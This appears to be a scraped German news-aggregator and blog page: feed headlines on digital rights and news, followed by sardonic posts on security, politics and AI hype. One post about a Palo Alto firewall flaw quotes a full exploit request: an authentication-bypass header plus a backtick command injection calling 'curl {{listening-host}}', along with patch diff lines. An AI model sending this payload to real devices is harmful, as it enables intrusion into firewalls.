Verbot von Tracking und personalisierter Werbung by henning (2024/11/20 09:31)

Withdraw support from UN Cybercrime Convention! by erdgeist (2024/10/22 02:36)

„Sicherheitspaket“ mit biometrischer Massenüberwachung: Die Ampel ist bankrott by khaleesi (2024/10/18 11:39)

„Sicherheitspaket“: Die größte Enttäuschung seit Beginn der Ampel-Regierung by khaleesi (2024/10/15 14:26)

38C3: Call for Participation hat begonnen by erdgeist (2024/10/10 17:07)

EDRi-gram, 20 November 2024 by EDRi (2024/11/20 08:31)

German petition calls for a fundamental right to ‘a life without digital coercion’ by EDRi (2024/11/20 08:30)

Non-fitted devices in the UK Home Office’s surveillance arsenal: Investigating the technology behind GPS fingerprint scanners by EDRi (2024/11/20 08:30)

Building technology by, for, and of the people: A vision for our digital future by EDRi (2024/11/20 08:30)

A new registry empowers the Slovenian public to monitor the use of AI systems by public institutions by EDRi (2024/11/20 08:30)

German federal health minister, Shein and Deutsche Bahn ‘awarded’ for worst privacy and data protection offences by EDRi (2024/11/20 08:30)

Promises unkept: The EU-US Data Privacy Framework under fire by EDRi (2024/11/20 08:30)

Save the date: The European Investigative Journalism Conference by Chiara Miraglia (2024/11/14 13:20)

Digital Methods Winter School 2025 by Chiara Miraglia (2024/11/14 13:15)

The International AI Summit 2024 by Chiara Miraglia (2024/11/14 13:07)

Glitter Meetup: What is happening in digital rights around the world? by Chiara Miraglia (2024/11/14 11:55)

EU DisinfoLab Webinar – Building FIMI resilience through models of practice: Taiwan’s 2024 elections by Chiara Miraglia (2024/11/14 11:51)

Global Voice Summit 2024 by Chiara Miraglia (2024/11/14 11:42)

EMIF Winter Event 2024 – Disinformation: Systemic Challenges, Structural Solutions by Chiara Miraglia (2024/11/14 10:58)

EDRi-gram, 24 October 2024 by EDRi (2024/10/24 07:31)

Sundhnukagigar: Isländischer Vulkan nahe Reykjavik speit schon wieder Lava by ZEIT ONLINE: Umwelt - Jonas E. Koch (2024/11/21 14:12)

Unterstützung für Klimapolitik: Energiewende für alle by ZEIT ONLINE: Wirtschaft - Petra Pinzler (2024/11/21 14:10)

Beamtenbesoldung: Landtagsplenum streitet um verschobene Besoldungserhöhung by ZEIT ONLINE: News - (2024/11/21 14:09)

Sicherungsverfahren: Vater auf Jagd getötet - Verfahren gegen 19-Jährigen beginnt by ZEIT ONLINE: News - (2024/11/21 14:08)

Technologiekonzern: Bosch verkürzt Arbeitszeit von Hunderten Mitarbeitern by ZEIT ONLINE: Arbeit - David Rech (2024/11/21 14:08)

Rollentrainer: Schon mal im eigenen Wohnzimmer gegen einen Weltmeister angetreten? by ZEIT ONLINE: Sport - Emma Seifert (2024/11/21 14:07)

3. Liga: 1860-Plan in Aachen: Nach Pokal-Aus in der Liga punkten by ZEIT ONLINE: News - (2024/11/21 14:01)

Kriminalität: Gesprengte Geldautomaten: 95 Millionen Euro Schaden in 2023 by ZEIT ONLINE: News - (2024/11/21 13:59)

Kommunen: Neue Kommission soll Förderungen für Kommunen analysieren by ZEIT ONLINE: News - (2024/11/21 13:57)

Weltklimakonferenz: Wut und Frust in Baku: UN-Klimagipfel ringt um Abschluss by ZEIT ONLINE: News - (2024/11/21 13:57)

Internationaler Haftbefehl: Auffahrunfall enttarnt mutmaßlichen Rauschgifthändler by ZEIT ONLINE: News - (2024/11/21 13:56)

Konjunktur: Südwestmetall sieht Talsohle für Betriebe nicht erreicht by ZEIT ONLINE: News - (2024/11/21 13:52)

Reisetipps für Introvertierte: "Keine Kultur, nichts angucken, dann Buffet" by ZEIT ONLINE: leben - Sara Geisler (2024/11/21 13:50)

BZgA-Umfrage: Kondome sind das beliebteste Verhütungsmittel bei jungen Menschen by ZEIT ONLINE: Gesundheit - (2024/11/21 13:48)

Trump-Regierung: Was heißt Pendlerpauschale auf Englisch? by ZEIT ONLINE: Ausland - Mark Schieritz (2024/11/21 13:46)

Donald Trump: Was der FCC-Vorsitz mit der Meinungsfreiheit im Netz zu tun hat by Tomas Rudl (2024/11/21 13:13)

Elektronische Patientenakte: Start verschiebt sich auf Sankt-Nimmerleins-Tag by Daniel Leisegang (2024/11/21 11:40)

Pay or okay: Privatsphäre nur gegen Gebühr by Martin Schwarzbeck (2024/11/21 10:48)

US-Justizministerium: Google soll Chrome verkaufen, um Suchmonopol zu brechen by Markus Reuter (2024/11/21 08:21)

Digital Fairness Act: EU-Gesetz soll Internet verbraucherfreundlicher machen by Maximilian Henning (2024/11/20 16:57)

Gewalthilfegesetz: Aus vor der Ziellinie? by Chris Köver (2024/11/20 13:52)

Databroker Files: Datenhandel ist Gift by Anna Biselli (2024/11/20 06:49)

Databroker Files: Wie Datenhändler NATO und US-Militär bloßstellen by Sebastian Meineck (2024/11/20 04:00)

Gegen die autoritäre Wende: Grundrechte zuerst! by netzpolitik.org (2024/11/19 13:11)

Neuer X-odus: Millionen Menschen stürmen Bluesky by Markus Reuter (2024/11/18 16:57)

Digital Services Act: So steht es um den Forschungszugang zu X, Facebook & Co. by Tomas Rudl (2024/11/18 15:46)

Hakenkreuz in der Kunst: Hausdurchsuchung wegen Verbreitung einer Karikatur by Markus Reuter (2024/11/16 12:44)

KW 46: Die Woche, als ein Wahltermin verkündet wurde by Anna Biselli (2024/11/16 08:51)

Bundestagswahl: Das Kreuz mit der Wahlsoftware by Leonhard Pitz (2024/11/15 10:23)

Europäische Ermittlungsanordnung: Deutschland treibt EU-weites Abhören in Fahrzeugen voran by Matthias Monroy (2024/11/14 18:30)

Falls hier jemand D-Link-Geräte einsetzt: HAHA SUCKER. Sagt D-Link. Ich paraphrasiere nur. ()

Wo wir gerade bei der Kategorie "genau mein Humor" waren: Ottawa paid nearly $670,000 for KPMG’s advice on cutting consultant costs. *Wieher* ()

Ich habe vor einer Weile angefangen, Compliance-Bullshit als Kunstförderung zu bezeichnen, weil es halt reines Theater ist und nichts bringt.Jetzt überlege ich, ob ich nicht auch zu typischen Sicherheitslücken einfach Retrocomputing sagen sollte, weil das genau derselbe Scheiß ist, über den wir schon in den 1980er Jahren gelacht haben.Aktuelles Beispiel: Palo Alto. Ja, die schon wieder. SCHON WIEDER. Ich hab auch keinen Bock mehr.X-PAN-AUTHCHECK: offIch wünschte, ich würde Witze machen.POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1 Host: {{Hostname}} X-PAN-AUTHCHECK: off Content-Type: application/x-www-form-urlencoded Content-Length: 99 user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1Und was fiel da raus? Richtig! Eine gültige Session-ID!Die haben einfach ein diff gemacht von dem Patch, auf dem Palo Alto jetzt wochenlang saß, während ihre Kunden fröhliche exploitet wurden.+ $user = $_POST['user']; + if (strlen($user) Die neue Eingabevalidierung ist ... eine Längenbegrenzung. Nein, wirklich!Ich wünschte, ich würde Witze machen.- return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username"); + $u = $s->escapeshellarg($username); + return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $u");Wisst ihr was? You had me at PHP. (via) ()

Hey, liebes BSI? Kurze Frage für einen Freund.Wieviele KRITIS-Organisationen setzen eigentlich Fortinet oder Palo Alto ein? Und sind damit durch diverse Audits und Pentests gekommen?Wir haben doch umfangreiche Dokumentationspflichten jetzt. Erzählt doch mal, wie gut die geholfen haben!Wie viele Firmen haben ISO-27001 und Fortinet/Palo Alto?Fällt euch selber was auf oder muss ich weiterreden?Update: Leserbrief:Ich arbeite in einem Kritis-Unternehmen (Strom). Habe heute im Flurfunk mitbekommen, dass wir in unserem neuen Rechenzentrum nicht mehr auf Fortinet setzen.Wir werden da etwas einsetzen von:Palo AltoBadumm TsssssIch persönlich wundere mich ja nicht, dass wir ständig gehackt werden. Ich wundere mich, dass wir nur so wenig gehackt werden. Das liegt wahrscheinlich daran, dass unsere Spezialexperten wegen des ganzen Checklistenballetts nicht bemerken, dass und wie lange und von wie vielen parallel sie schon kompromittiert wurden. ()

Die ARD schreibt:ATACMS können mit Streumunition bestückt werden, die sich am Zielort in einem weiten Radius verteilt. International ist Streumunition höchst umstritten, weil sie wegen ihres Streufaktors auch Jahre nach einem militärischen Konflikt zu zivilen Opfern führen kann. Im Ukraine-Krieg wurde sie auch deshalb ausgeliefert, um den großen Vorsprung Russlands bei der Munitionsproduktion auszugleichen. Zudem kann Streumunition besonders effektiv gegen Truppen und ungepanzerte Fahrzeuge im offenen Gelände eingesetzt werden.Schade, dass die ARD sich kein Fact Checking leisten kann. Sonst hätte ihnen jemand mitgeteilt, dass Streumunition nicht "umstritten" sondern geächtet ist. Das ist ethisch so sonnenklar, dass sogar der Heilige Stuhl das ratifiziert hat. Selbst der Südsudan ist beigetreten. Aber die USA, Russland und die Ukraine haben nicht unterschrieben, genausowenig wie China und Israel, Indien und Pakistan. Selbst in der EU gibt es ein paar Gruselstaaten, die sich in Ethikfragen noch hinter dem Südsudan eingereiht haben: Finnland, Estland, Lettland, Polen, Rumänien und Griechenland. Eine Schande.Deutschland hat das unterschrieben und ratifiziert. Insofern bin ich irritiert, dass die ARD das jetzt als eine offene Streitfrage darstellt, ob man das einsetzen sollte oder nicht. ()

Läuft offenbar gut, der Fünffrontenkrieg Israels gerade. So gut, dass Artikel wie dieser in der Jerusalem Post veröffentlicht werden:Southern Lebanon is actually northern Israel - opinionNa dann können wir das ja bedenkenlos annektieren! ()

Fallout: Japan eröffnet stark mit einer Jury-Rig-Gauss-Handgun (vergleiche: die Bastelkanone aus der Abe-Ermordung). ()

Das US-Justizministerium denkt laut darüber nach, Google zum Chrome-Verkaufen zu zwingen. Wegen Monopolmissbrauchs.Ich glaube nicht, dass das ernst gemeint ist. Ich glaube, das Kalkül lief etwa so: Biden ist eine lahme Ente, wir sind frisch abgewählt, und Trump hasst unsere Kumpels, die Tech Bros.Trump findet ja, dass die Social Networks und Suchmaschinen ihn unfair benachteiligt haben, indem sie seine Misinformationen zu bekämpfen und rauszufiltern versucht haben, und hat daher als neuen FCC-Chef (deren Kommunikations-Regulierer) diesen Spezialexperten ausgesucht, der von einem "Zensurkartell" spricht, das man jetzt zerschlagen müsse.Das ungerechte Zorn der Republikaner richtet sich vor allem gegen Facebook, aber auch gegen Google, wegen Suche und Youtube, wo Google bei Covid-Lügnern Hinweise eingeblendet hat, so man sich inhaltlich belastbarer informieren kann.Aus Sicht der untoten Democrats im abgewählten Justizministerium ist also absehbar, dass Trump die Tech-Riesen zerschlagen wird. Die Democrats wissen auch, dass Kartelle Scheiße sind, und wenn die Tech Bros nicht alle in Democrat-Hochburgen säßen und dort Arbeitsplätze schüfen, hätte man vielleicht auch schonmal etwas zu unternehmen versucht. Aber hey, wenn die eh demnächst geschlachtet werden, dann kann man wenigstens jetzt so tun, als sei man selbst der Auslöser gewesen, der hier Gerechtigkeit schafft. Denn das Narrativ ist den Democrats ja bereits ziemlich komplett entglitten an der Stelle. Google Search ist so schlecht geworden, dass Googles "das schadet dem Kunden" vor allem Gelächter auslöst. ()

Braucht ihr mal einen richtigen Bauchlacher? Die Meldung hier liefert.immerhin sei Windows 11 bereits "das sicherste Betriebssystem der Welt", wie die Ankündigung betont.BWAHAHAHA genau mein Humor!Und schließlich will Microsoft den Identitätsschutz verbessern, um Phishing-Angriffe zu verhindern.Der einzige, der alle eure Daten sehen können soll, soll Microsoft sein. Und ihr bezahlt noch dafür. Wie diese Mauer um Mexiko herum, falls ihr euch erinnert. ()

Erinnert ihr euch an Südwestfalen-IT? Diesen kommunalen Dienstleister für die ganzen Kommunen in der Gegend? Der dann einen "Cybervorfall" hatte und dann monatelang nicht in der Lage war, wieder voll verfügbar zu sein?Da gibt es jetzt Folgen.Einem ehemaligen Geschäftsführer, der noch Gehalt kassierte, wurde gekündigt. Gegen weitere Mitarbeiter wurden Disziplinarmaßnahmen eingeleitet.Und, fast noch schockierender:Die bisherige Organisationsform mit einer "aufgeblähten" 119-köpfigen Verbandsversammlung und einem von Politikern dominierten Vorstand werde reformiert, heißt es. Künftig sollen mehr IT-Experten dem Gremium angehören.ACH. ACH WAS. Es ist jemandem aufgefallen, dass Politiker gar nichts können und man ihnen keine Verantwortung übergeben darf, schon gar nicht in Gesellschaften, die einen tatsächlichen Zweck erfüllen sollen und nicht nur Geld verbrennen dürfen wie Lotto und SPD-eigene Verlage? Das ist ja unglaublich!Gibt es etwa doch noch Hoffnung?Update: Wenn man genauer hinguckt, ist die Antwort natürlich: Nein, gibt es nicht. Denn keiner von denen musste in den Knast, keiner musste irgendwas zurückzahlen, im Gegenteil hat der eine Typ noch jahrelang Gehalt gekriegt, ohne dafür auch nur zur Arbeit erschienen zu sein. Wie das halt so ist, wenn "kommunale Dienstleister" mit abgehalfterten Politikern bestuhlt werden. ()

Im Moment kursieren (natürlich!) Anschuldigungen des Wahlbetrugs in den USA.Hier ist der seriösere der offenen Briefe.Der Zug ist abgefahren. Biden und Harris hatten JAHRE Zeit, das Wahlsystem zu reformieren. Haben sie nicht gemacht. Weil sie dachten, vielleicht, dass ihnen das Herrschaftswissen selber mal nutzen würde.Geliefert wie bestellt. Ich habe kein Mitleid und keinen Drang da irgendwas aufgeklärt zu kriegen. Das war ihre Chance und sie haben es verkackt.So und nur so funktioniert Evolution. Wenn man sich aus verkacktem Verhalten wieder rausschleimen kann, funktioniert das nicht. Das muss tödlich sein und die nächste Generation hat dann hoffentlich was gelernt. Oder sie ereilt, genauso verdient, dasselbe Schicksal.Ich positioniere mich immer gerne so, dass ich danach Told You So sagen kann. Well... Told You So. Nein, ich werde euch jetzt nicht helfen, die Auswirkungen eures nicht auf mich hörens zu verringern. ()

Hier kamen mehrere Leserbriefe rein, dass Streumunition ja nicht wirklich geächtet sei. Nur Länder, die nicht annahmen, dass sie demnächst Krieg führen werden, hätten sie geächtet. Und überhaupt, wieviel kann eine Ächtung schon wert sein, wenn China und Indien nicht dabei sind, die zusammen die Hälfte der Menschheit sind.Nun, nehmt nicht mein Wort, dass das geächtet ist. Nehmt das der ARD, wenn es um Russland ging.Diese Waffen sind durch internationale Verträge geächtet.Ach. Ach was. Aber wenn die Ukraine das einsetzt, ist es nicht geächtet, nehme ich an? Tolle Wurst. ()

All diese Palo Alto Exploits, das kann Fortinet nicht auf sich sitzen lassen!Chinese hackers exploit Fortinet VPN zero-day to steal credentialsUnd natürlich ist Fortinet genau so drauf wie der Rest der Industrie, wenn es um Bug-Fix-Geschwindigkeit geht."Volexity reported this vulnerability to Fortinet on July 18, 2024, and Fortinet acknowledged the issue on July 24, 2024," explains the report."At the time of writing, this issue remains unresolved and Volexity is not aware of an assigned CVE number."Aber Fortinet ist nicht Microsoft, also kolportiert die Presse nicht das übliche unerträgliche Gewinsel von Microsoft, dass hier unschuldige Kunden gefährdet würden und man doch Responsible Disclosure fordert. Da krieg ich jedesmal Zucken in der Faust, wenn ich das lese. Die Kunden werden ja nicht von der Disclosure gefährdet sondern von der beschissenen Produktqualität ihrer versifften Zulieferer. ()

OLG Schleswig-Holstein: Keine Social-Media-Sperre ohne vorherige Nutzeranhörung.Die Entscheidung wird wahrscheinlich klarer, wenn man guckt, um was für einen Beitrag es hier ging:Der Blockierte hatte das Ergebnis einer Kreistagswahl 2021 so kommentiert: "Die Deutschen sind sowas von krank. Deutschland hat fertig."Lol wat? Dafür sperrt Facebook Accounts und löscht unilateral Beiträge?! ()

Diese Meldung funktioniert auf mehreren Ebenen.Die Deutsche Bank steigt bei "KI"-Startup Aleph Alpha ein, kauft Anteile von Frühinvestoren (d.h. kauft die VCs raus, die offenbar kapiert haben, dass dieser "KI"-Scheiß Bullshit ist und raus wollten).Das finde ich schonmal eine gute Nachricht, wenn die VCs um ihr Leben fürchten.Aber was will die Deutsche Bank mit "KI"? Nun, ...Das Institut nimmt auch an einem Projekt von Creance.ai teil – einer Kooperation von PwC Deutschland und Aleph Alpha, bei der untersucht wird, wie generative KI helfen kann, Compliance-Anforderungen effizienter zu bewältigen. Verträge mit Dienstleistern sollen im Einklang mit der EU-Verordnung DORA validiert werden.Da unseren Regulierern und Politikern in Sachen "was könnten wir mal besser machen" nichts einfällt außer "Hmm man könnte mehr Papierkram von den Firmen fordern", versinken die Firmen gerade alle in sinnlosem Papierkrieg und produzieren alle Palettenweise sinnlosen Text, den nie jemand lesen wird.Denn wer sollte das lesen? Die Regulierungsbehörden? Soviele Bürger gibt es in diesem Land nicht, die die alle einstellen müssten. Die Regulierer wissen das, die Firmen wissen das, und damit ist der Weg frei für: "KI" schreibt die sinnlosen Texte, die eh nie jemand lesen wird.Eine Erfolgsgeschichte! Ach was sage ich: Ein Exportschlager!!Denn Deutschland drückt diese Marktverzerrung (kleine Konkurrenten können sich den Scheiß nicht leisten, so garantiert die Politik das Überleben der Deutschen Bank und anderer Ineffizienzmaschinen) natürlich EU-weit durch. Die werden auch alle "KI" kaufen müssen. Warum also nicht bei uns?!Wenn es nicht so traurig wäre, könnte man die alle prima auslachen.Update: Ist ja gut. Ihr könnt mir zu schreiben aufhören, dass man halt eine "KI" anschaffen muss, um den "KI"-Compliance-Output zu lesen. Der Witz war implizit, denn eine "KI" ist ja keine Person. Das liest nach wie vor niemand. ()